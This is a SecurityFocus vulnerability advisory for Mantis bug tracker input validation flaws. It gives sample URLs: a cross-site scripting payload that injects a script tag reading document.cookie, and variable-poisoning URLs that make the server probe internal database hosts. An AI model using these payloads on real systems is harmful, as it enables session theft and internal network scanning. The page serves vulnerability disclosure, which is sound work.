Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Mantis Multiple Input Validation Vulnerabilities

No exploit is required.

Samples have been provided:

A - Cross Site Scripting Vulnerabilities

http://www.example.com/view_all_set.php?sort=severity&dir="><script>alert(document.cookie)</script>&type=2

B.- Database scanner via variable poisoning

http://www.example.com/core/database_api.php?g_db_type=mysql://invaliduser@localhost:3336
http://www.example.com/core/database_api.php?g_db_type=mysql://root@localhost:3336
http://www.example.com/core/database_api.php?g_db_type=informix://localhost:8080
http://www.example.com/core/database_api.php?g_db_type=mysql://root@10.x.y.z







 

Privacy Statement
Copyright 2008, SecurityFocus